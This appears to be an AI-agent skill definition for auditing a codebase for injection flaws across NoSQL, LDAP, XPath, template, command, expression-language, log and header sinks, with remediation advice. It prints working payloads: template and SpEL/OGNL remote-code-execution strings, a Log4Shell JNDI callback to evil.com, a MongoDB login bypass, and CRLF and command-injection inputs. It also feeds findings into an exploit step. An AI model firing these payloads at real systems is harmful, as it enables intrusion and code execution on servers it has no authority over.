AgentSkillsCN

perseus-injection

深度剖析注入类漏洞(NoSQL、LDAP、XPath、模板注入、操作系统命令注入、表达式语言注入)

SKILL.md
--- frontmatter
name: perseus-injection
description: Deep-dive injection vulnerability analysis (NoSQL, LDAP, XPath, Template, OS Command, Expression Language)

Perseus Injection Specialist

Context & Authorization

IMPORTANT: This skill performs deep injection vulnerability analysis on the user's own codebase. This is defensive security testing to find injection flaws before attackers do.

Authorization: The user owns this codebase and has explicitly requested this specialized analysis.


Multi-Language Support

LanguageFrameworks & ORMs
JavaScript/TypeScriptMongoose, Prisma, TypeORM, Sequelize, EJS, Pug, Nunjucks, Handlebars
Gomongo-driver, go-ldap, html/template, text/template
PHPLaravel Eloquent, Doctrine, Blade, Twig, Symfony
PythonPyMongo, Motor, SQLAlchemy, Jinja2, Mako, Django Templates
Rustmongodb, askama, tera, handlebars-rust
JavaSpring Data, Hibernate, Freemarker, Velocity, Thymeleaf, OGNL, SpEL
RubyMongoid, ERB, Slim, Haml
C#MongoDB.Driver, Razor, Entity Framework

Overview

This specialist skill performs comprehensive injection analysis beyond basic SQLi/XSS, covering advanced injection vectors often missed by standard scans.

When to Use: After /audit identifies potential injection points, or when the application uses NoSQL, LDAP, XML, or template engines.

Goal: Find all injection vectors including less common but equally dangerous ones.

Injection Types Covered

TypeSinksImpact
NoSQL InjectionMongoDB, Redis, Elasticsearch, DynamoDBData exfiltration, auth bypass
LDAP InjectionLDAP queries, directory lookupsAuth bypass, info disclosure
XPath InjectionXML queriesData extraction
Template Injection (SSTI)All template enginesRCE
OS Command InjectionShell executionRCE
Expression LanguageEL, SpEL, OGNL, CELRCE
Header InjectionHTTP headers, emailsResponse splitting, phishing
Log InjectionLog4j, logging frameworksLog forging, RCE (Log4Shell)

Execution Instructions

Phase 1: NoSQL Injection Analysis (3 Parallel Agents)

  1. MongoDB Injection Analyst:

    • "Find all MongoDB query operations. Check for operator injection, $where injection, $regex DoS."

    Language-Specific Patterns:

    javascript
    // Node.js/Mongoose - VULNERABLE
    User.findOne({ username: req.body.username, password: req.body.password });
    // Attack: { "password": { "$ne": "" } }
    
    go
    // Go/mongo-driver - VULNERABLE
    filter := bson.M{"username": username, "password": password}
    collection.FindOne(ctx, filter)
    
    php
    // PHP/MongoDB - VULNERABLE
    $collection->findOne(['username' => $_POST['username']]);
    
    python
    # Python/PyMongo - VULNERABLE
    db.users.find_one({"username": request.json["username"]})
    
    rust
    // Rust/mongodb - VULNERABLE
    let filter = doc! { "username": &username };
    collection.find_one(filter, None).await?;
    
    java
    // Java/Spring Data MongoDB - VULNERABLE
    Query query = new Query(Criteria.where("username").is(username));
    
  2. Redis Injection Analyst:

    • "Find Redis operations with user input. Check for: EVAL with user data, key injection, Lua script injection."

    Patterns:

    javascript
    // Node.js - VULNERABLE
    redis.eval(`return redis.call('get', '${userInput}')`, 0);
    
    go
    // Go - VULNERABLE
    rdb.Eval(ctx, script, []string{userKey})
    
    python
    # Python - VULNERABLE
    r.eval(f"return redis.call('get', '{key}')", 0)
    
  3. Elasticsearch/DynamoDB Analyst:

    • "Find Elasticsearch queries, DynamoDB expressions with user input. Check for query DSL injection, expression injection."

Phase 2: Directory Injection Analysis (2 Parallel Agents)

  1. LDAP Injection Analyst:

    • "Find LDAP operations. Check for filter injection, DN injection."

    Language-Specific Patterns:

    java
    // Java - VULNERABLE
    String filter = "(uid=" + username + ")";
    ctx.search(base, filter, controls);
    
    python
    # Python/ldap3 - VULNERABLE
    conn.search(base, f'(uid={username})')
    
    go
    // Go/go-ldap - VULNERABLE
    filter := fmt.Sprintf("(uid=%s)", username)
    l.Search(ldap.NewSearchRequest(base, ldap.ScopeWholeSubtree, filter))
    
    php
    // PHP - VULNERABLE
    ldap_search($conn, $base, "(uid=$username)");
    
  2. XPath Injection Analyst:

    • "Find XML processing with XPath. Check for user input in XPath expressions."

    Patterns:

    java
    // Java - VULNERABLE
    String xpath = "//user[@name='" + username + "']";
    XPath.evaluate(xpath, document);
    
    python
    # Python/lxml - VULNERABLE
    tree.xpath(f"//user[@name='{username}']")
    

Phase 3: Template Injection Analysis (4 Parallel Agents)

  1. Python Template Analyst (Jinja2, Mako, Django):

    • "Find template rendering. Check for user input in template strings."

    Patterns:

    python
    # Jinja2 - VULNERABLE
    Template(user_input).render()
    # Test: {{7*7}} -> 49
    # RCE: {{config.__class__.__init__.__globals__['os'].popen('id').read()}}
    
    # Mako - VULNERABLE
    Template(user_input).render()
    # Test: ${7*7} -> 49
    
    # Django - VULNERABLE (if user controls template)
    Template(user_input).render(Context())
    
  2. Java Template Analyst (Freemarker, Velocity, Thymeleaf):

    • "Find template engine usage. Check for SSTI vectors."

    Patterns:

    java
    // Freemarker - VULNERABLE
    Template t = new Template("name", new StringReader(userInput), cfg);
    // Test: ${7*7} -> 49
    // RCE: <#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}
    
    // Velocity - VULNERABLE
    Velocity.evaluate(context, writer, "tag", userInput);
    // Test: #set($x=7*7)$x -> 49
    
    // Thymeleaf - VULNERABLE (with preprocessing)
    // Test: __${7*7}__ -> 49
    
  3. JavaScript Template Analyst (EJS, Pug, Nunjucks):

    • "Find template rendering with user input."

    Patterns:

    javascript
    // EJS - VULNERABLE
    ejs.render(userInput, data);
    // Test: <%= 7*7 %> -> 49
    // RCE: <%= process.mainModule.require('child_process').execSync('id') %>
    
    // Pug - VULNERABLE
    pug.render(userInput);
    
    // Nunjucks - VULNERABLE
    nunjucks.renderString(userInput, data);
    
  4. Go/Rust/PHP Template Analyst:

    • "Find template usage in Go, Rust, PHP."

    Patterns:

    go
    // Go text/template - VULNERABLE (if user controls template)
    t, _ := template.New("t").Parse(userInput)
    // Go html/template auto-escapes HTML but not all contexts
    
    rust
    // Rust/Tera - Check for user-controlled templates
    Tera::one_off(&user_input, &context, true)?;
    
    php
    // PHP/Twig - VULNERABLE
    $twig->createTemplate($userInput)->render();
    // Blade - Check for {!! !!} (unescaped)
    

Phase 4: Command Injection Analysis (3 Parallel Agents)

  1. Shell Execution Analyst:

    • "Find all shell execution points across languages."

    Language-Specific Sinks:

    javascript
    // Node.js - VULNERABLE
    exec(`ls ${userInput}`);
    execSync(`git clone ${url}`);
    spawn('sh', ['-c', cmd]);
    
    go
    // Go - VULNERABLE
    exec.Command("sh", "-c", userInput).Run()
    exec.Command("bash", "-c", fmt.Sprintf("echo %s", input))
    
    php
    // PHP - VULNERABLE
    system($cmd);
    shell_exec($_GET['cmd']);
    passthru($input);
    proc_open($cmd, $descriptors, $pipes);
    `$cmd`; // backticks
    
    python
    # Python - VULNERABLE
    os.system(cmd)
    subprocess.call(cmd, shell=True)
    subprocess.Popen(cmd, shell=True)
    os.popen(cmd)
    
    rust
    // Rust - VULNERABLE
    Command::new("sh").arg("-c").arg(&user_input).output()?;
    
    java
    // Java - VULNERABLE
    Runtime.getRuntime().exec(cmd);
    new ProcessBuilder("sh", "-c", cmd).start();
    
    ruby
    # Ruby - VULNERABLE
    system(cmd)
    `#{cmd}`
    %x{#{cmd}}
    exec(cmd)
    
  2. Argument Injection Analyst:

    • "Find cases where user controls command arguments (even without shell)."

    Patterns:

    javascript
    // Argument injection - VULNERABLE
    execFile('git', ['clone', userUrl]); // --upload-pack injection
    execFile('curl', [userUrl]); // -o injection
    
  3. Indirect Command Injection Analyst:

    • "Find indirect command injection via filenames, environment variables."

Phase 5: Expression Language Injection (2 Parallel Agents)

  1. Java EL/SpEL/OGNL Analyst:

    • "Find expression language evaluation with user input."

    Patterns:

    java
    // SpEL - VULNERABLE
    ExpressionParser parser = new SpelExpressionParser();
    parser.parseExpression(userInput).getValue();
    // RCE: T(java.lang.Runtime).getRuntime().exec('id')
    
    // OGNL (Struts) - VULNERABLE
    OgnlUtil.getValue(userInput, context, root);
    // RCE: (#rt=@java.lang.Runtime@getRuntime(),#rt.exec('id'))
    
    // EL - VULNERABLE
    ${userInput} in JSP/JSF
    
  2. Other Expression Languages:

    • "Check for CEL (Google), Expr, other expression evaluators."

Phase 6: Log Injection Analysis (2 Parallel Agents)

  1. Log4j/Log4Shell Analyst:

    • "Check for Log4j JNDI injection vulnerability."

    Pattern:

    java
    // VULNERABLE to Log4Shell (CVE-2021-44228)
    logger.info("User: " + username);
    // Attack: ${jndi:ldap://evil.com/a}
    
  2. Log Forging Analyst:

    • "Check for log injection that can forge log entries, inject newlines."

    Patterns:

    javascript
    // VULNERABLE - newlines in logs
    console.log(`User logged in: ${username}`);
    // Attack: username = "admin\n[INFO] Admin action performed"
    

Phase 7: Header Injection Analysis (1 Agent)

  1. HTTP Header Injection Analyst:

    • "Find HTTP header setting with user input. Check for CRLF injection."

    Patterns:

    javascript
    // Node.js - VULNERABLE
    res.setHeader('X-Custom', userInput);
    // Attack: value\r\nSet-Cookie: evil=true
    
    go
    // Go - VULNERABLE
    w.Header().Set("Location", userInput)
    
    php
    // PHP - VULNERABLE
    header("Location: " . $_GET['url']);
    

Safe Payload Reference

Injection TypeDetection PayloadVerification
NoSQL (MongoDB){"$gt": ""}Returns all records
NoSQL (Redis)\r\nSET evil 1\r\nKey created
LDAP`)(uid=))((uid=*`
XPath' or '1'='1Returns all nodes
SSTI (Jinja2){{7*7}}Output: 49
SSTI (Freemarker)${7*7}Output: 49
SSTI (EJS)<%= 7*7 %>Output: 49
Command; sleep 55 second delay
SpEL${7*7}Output: 49
Header\r\nX-Injected: trueNew header appears
Log4j${jndi:ldap://x.x}DNS callback

Output Requirements

Create deliverables/injection_deep_analysis.md:

markdown
# Advanced Injection Analysis

## Summary
| Type | Instances Found | Vulnerable | Safe |
|------|-----------------|------------|------|
| NoSQL | X | Y | Z |
| LDAP | X | Y | Z |
| Template (SSTI) | X | Y | Z |
| Command | X | Y | Z |
| Expression | X | Y | Z |
| Log Injection | X | Y | Z |
| Header | X | Y | Z |

## Language/Framework Detected
- Primary: [e.g., Node.js/Express, Go/Gin, PHP/Laravel]
- Template Engine: [e.g., EJS, Jinja2, Blade]
- Database: [e.g., MongoDB, Redis]

## Critical Findings

### [INJ-001] MongoDB Operator Injection in Login
**Severity:** Critical
**Type:** NoSQL Injection
**Language:** Node.js/Mongoose
**Location:** `auth/login.js:34`

**Vulnerable Code:**
```javascript
const user = await User.findOne({
  username: req.body.username,
  password: req.body.password
});

Attack:

json
POST /login
{"username": "admin", "password": {"$ne": ""}}

Impact: Authentication bypass - attacker can login as any user

Remediation:

javascript
// Validate types before query
if (typeof username !== 'string' || typeof password !== 'string') {
  return res.status(400).json({ error: 'Invalid input' });
}
const user = await User.findOne({ username, password: hash(password) });

[INJ-002] SSTI in Email Template

Severity: Critical Type: Server-Side Template Injection Language: Python/Jinja2 Location: utils/email.py:56

Vulnerable Code:

python
template = Template(f"Hello {user_name}, your order is ready")

Attack:

code
user_name = "{{config.__class__.__init__.__globals__['os'].popen('id').read()}}"

Impact: Remote Code Execution


Template Engine Security Matrix

EngineLanguageSandboxedRisk if User-Controlled
Jinja2PythonNoCritical (RCE)
EJSNode.jsNoCritical (RCE)
FreemarkerJavaPartialCritical (RCE)
BladePHPNoHigh (RCE possible)
html/templateGoYesLow (auto-escape)

Recommendations

  1. Validate input types before NoSQL queries
  2. Never use user input in template source strings
  3. Use parameterized commands, not shell=True
  4. Update Log4j to 2.17+ or disable lookups
  5. Sanitize CRLF characters in header values
code

**Next Step:** Findings feed into `/exploit` for verification.